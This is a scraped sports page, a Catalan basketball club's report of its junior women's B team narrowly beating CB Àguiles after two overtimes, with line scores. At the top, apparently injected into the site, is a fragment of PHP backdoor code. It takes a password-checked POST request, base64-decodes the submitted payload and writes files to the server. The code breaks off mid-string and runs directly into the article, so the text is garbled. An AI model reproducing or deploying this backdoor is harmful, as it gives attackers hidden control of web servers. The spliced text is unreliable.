function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El júnior femení B es mostra molt irregular però derrota el CB Àguiles després de dues pròrrogues (63-64) - Tgn Bàsquet Club -

El júnior femení B es mostra molt irregular però derrota el CB Àguiles després de dues pròrrogues (63-64)

Updated: octubre 8, 2019

L’equip júnior femení B va haver de patir molt per aconseguir una victòria molt treballada contra el CB Àguiles. Les tarragonines van dominar el primer quart gràcies a l’encert en els triples que servien per trencar una defensa molt tancada de les locals. Amb tot, l’atac lila no era agressiu i quan els tirs del perímetre no van entrar, les de Sant Coloma de Queralt van capgirar el resultat: del 13-16 al 29-19. Una petita millora visitant va permetre minimitzar els danys (29-25 a la mitja part) i a la represa el TGN Bàsquet va mostrar una intensitat més gran que va permetre les tarragonines obrir una escletxa 31-39 (minut 26). Una altra davallada de joc de les visitants, però, va permetre l’Àguiles tornar a refer-se.

En aquesta dinàmica irregular, el TGN Bàsquet va arribar a l’últim minut amb quatre punts d’avantatge. De fet, faltant 22 segons, el marcador era de 49-52 i pilota per a les tarragonines però les visitants es van precipitar, van perdre la possessió i les locals van anotar un triple a tauler sobre la botzina que forçava la primera pròrroga. En el temps extra (qualsevol de les dues pròrrogues) l’encert en el tir dels dos equips va ser molt baix, anotant en comptagotes i en aquest panorama, un tir lliure de Txell Aresté va decidir el triomf.

CB ÀGUILES        63

TGN BÀSQUET   64

CB ÀGUILES: Peñarroja, Montanyà 15, Ferran 26, Martínez, Figueras 4 -cinc inicial- Marin 8, Ramon, Moron, Canals 4, Mullerat 6. Triples 3: Marin 1, Montanyà 2. Tirs lliures 12/31. Faltes 25. Eliminada: Canals 42’.

TGN BÀSQUET: Steinhauser 4, Borges 4, Carmona 3, Aresté 8, Roca 4 -cinc inicial- Mallol 9, Batlle 2, López C 8, Fuster 3, Hierro 8, De Juanas 11. Triples 5: Mallol 3, Fuster 1, Aresté 1. Tirs lliures 9/30. Faltes 27. Eliminades: Camona 32’, López C. 37’, Roca 43’.

PARCIALS: 13-16, 16-9 (29-25 descans) 6-16 i 17-11 (52-52 min 40). 6-6; 5-6 (63-64 Final).

ÀRBITRE: Prado